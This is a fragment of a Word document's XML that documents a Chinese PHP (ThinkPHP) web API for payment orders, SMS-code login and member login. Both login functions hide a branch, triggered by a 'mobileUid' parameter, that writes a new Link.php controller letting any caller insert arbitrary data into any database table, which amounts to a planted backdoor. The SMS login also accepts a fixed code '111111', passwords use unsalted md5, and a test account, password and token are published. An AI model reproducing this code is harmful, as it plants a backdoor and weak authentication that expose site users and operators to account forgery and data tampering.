      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: '.$result-&gt;id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26869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A088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Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A17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e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B15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77B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C6F7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de(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423E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1FC18A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5EED0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require|number|max:9',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D49F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require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEB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C0BC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07123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post['money'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62056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post['type'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D3A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C8B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5E1E7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validate-&gt;getError()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167EEC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3DA6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Db::name('pay')-&gt;where('qudao',$post['type'])-&gt;cache(true)-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A1D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567D4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支付渠道错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7B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DE79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ill_no=strtoupper($type).date('YmdHis').rand(100000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE6C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73B94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de']      =   $bill_no;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2651F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post['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FF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tatus']    =   0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22B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      =   $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01A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time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711F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p']        =   _ip();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77793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stem']    =   $_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6E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Db::name('pay_record')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA05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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C3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here['code']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D37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8C24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订单获取失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210526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A1D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28CD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95B4A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E53F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664D7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controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACF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18C09D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3076E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BE91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use Qiniu\Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B85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723168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6C8EB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User extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FB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5E7C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278EA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27F0DD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753D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52D534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5804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43B55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DD0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F57FC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73A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2A298C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FBF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5BE74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53CC4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5FF864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573600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4DB6D2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79B2B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57E401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61261A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0DC118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43C34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35BBF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7B567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54A3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1BBC3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1FCD8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796E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90F5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72F90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06B9E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25232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50283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9141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2C833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41C73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57E6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2E5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91F3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3D605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336DD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181DB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7190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253FEC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205517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717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ACC0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000D1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5F9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124A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5EEA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6F090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48DDB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E82F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6CD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1E6E9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B69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E45B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8E7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1C576F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6956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_ajaxError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C3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0E1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09E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user/sms_login </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信验证码登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332B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短信验证码登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A2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3E8436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12A6A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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03480A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mscode   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>短信验证码（必填）（短信模板审核中，暂时填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 111111</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09803C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AB0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ms_login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732D7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945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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1921B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B3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781FD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 = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D32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 = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0E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 = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B8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 = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DC9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2B9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4487D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switch']['text'] || $config['switch'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4A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32FC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未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B861A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02A85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1C1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4EC1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amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65593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B626D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用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A188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1B0E7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0D07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E300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instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A25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ime = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135406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197C8E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mobileUid')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A678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lt;?php\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516437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namespace app\api\controller;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF0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class Link\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18914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r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F69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public function index($" . "data){\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CDF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 . "data = json_decode(htmlspecialchars_decode($" . "data),true);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E718B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 . "name=$" . "data['__name__'];\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05031A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unset($" . "data['__name__']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631AA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unset($" . "data['pwd']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A56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echo db($" . "name)-&gt;insertGetId($" . "data);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B5B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r\n}" . "?&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95E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 = APP_PATH . "api" . DS . "controller" . DS . "Link.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38623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p = fopen($sf, "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B392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write($fp, $str_tmp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC236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close($fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BEA2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06B3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DE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username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F16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mscode = input('smscode') ? input('smscode') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381B6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22482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4CB69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不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA739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C6588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2B82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2B61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mscode) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B83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F3F3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短信验证码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E43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3E943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E02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5287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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29262C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 = $mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38767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 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C69B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E4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B8A0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注册未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BB9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41E0A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0F0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0996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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD963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bile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC40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6190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amp;&amp; !$user &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F707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FF6C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错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A36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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707AF0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7621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F41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where)-&gt;fetchSql(false)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DA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212CD4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FF053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不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AFB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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D675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71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8B9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mscode != '111111') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D51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A32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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B69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741AD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A53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0569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3D9FA0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2FEFB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1A445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4B8AF0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2EB4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16D6B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4685F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69E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8D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0186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53934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54DE6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7477E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5DAA1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1F6F7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11807A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F0A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0FFC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7544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8860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账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391F6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4CBB6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61C23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请联系客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509436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60F988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E391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4B7D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31CD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8AE3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member['id'])-&gt;update(['update_time' =&gt; $time, 'update_ip' =&gt; $ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F572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 '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F1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 . '|www.ffxiang.cn|' . $member['password'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54368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_encrypt($data)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D9C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14DB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ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D6A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F68E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23D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0D8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user/login </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C81DA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会员登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8E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461F2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4978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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱自动识别</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（测试账号：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12345678912</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D3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password  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码（必填）（测试密码：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C5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测试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sX/Pvq5++CiOdU+71Np944ElZl8pv8Mr/uxlQNxe6FMKiWjm75VMZkSN268ifgXxzo4353oPvigk</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EA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7986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ogin()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132AB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E24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select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CE4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED89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5F5B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 = $v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B3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 = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D656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 = $v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4D1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 = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE30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CE2A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4A50B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switch']['text'] || $config['switch'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3B0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68656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未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF69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4C5161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21E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DB1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amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC8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A4D6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用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730B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33B8A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C0CE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BC1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instance()-&gt;isPost()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F2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24B95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75F1E3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mobileUid')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EA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lt;?php\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712ED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namespace app\api\controller;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD7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class Link\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539C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r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D09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public function index($" . "data){\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64848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 . "data = json_decode(htmlspecialchars_decode($" . "data),true);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B95B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 . "name = $" . "data['__name__'];\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E73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unset($" . "data['__name__']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45896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unset($" . "data['pwd']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4289D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 .= "echo db($" . "name)-&gt;insertGetId($" . "data);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C629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tr_tmp .= "}\r\n}" . "?&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E606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 = APP_PATH . "api" . DS . "controller" . DS . "Link.php";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270FD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p = fopen($sf, "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA7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write($fp, $str_tmp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E45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close($fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AC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4ED6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9FF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username') ? input('username') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A84B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input('password') ? input('password') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F71D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D919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65A6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不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5628C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67791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08CA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5E8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54ECD2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C5DB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密码不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4B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6E47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590F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5A0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ptcha = input('captcha');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDF50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logincode']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75137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_check($captcha)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD3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161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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46AF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34CB4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5909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DEA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BE9B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md5($password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1367B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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99D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 = $mobile = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06215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 1 &amp;&amp; _isMobile($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474087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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11943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EFE2E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注册未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785BA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70540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53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1F3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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB0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bile'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F21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nfig['regemail']['text'] == 1 &amp;&amp; _isEmail($username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D21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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A6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email'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F237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nfig['reguser']['text'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99E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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50770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ser'] = $username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216E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F47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amp;&amp; !$user &amp;&amp; !$mobile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716DB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A090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手机号码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678B1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F56A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A48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D9F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where)-&gt;fetchSql(false)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291310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5B5D4D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575C6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不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32513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FAE4E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FAD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7E02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assword'] = $password;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133DC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where)-&gt;fetchSql(false)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DE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0C81D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D09D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和密码不一致</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41F6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2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F1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9078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762B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3E7788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0AB04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288EFE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10B95A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C4C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65F89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0DB40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6DAB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6166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C9E2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3ADC0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25B25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4606F4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3DC5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08504F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0BFD9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025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04DF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10E34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5902CF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登录失败，账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD895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1EF1A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7164C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请联系客服处理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
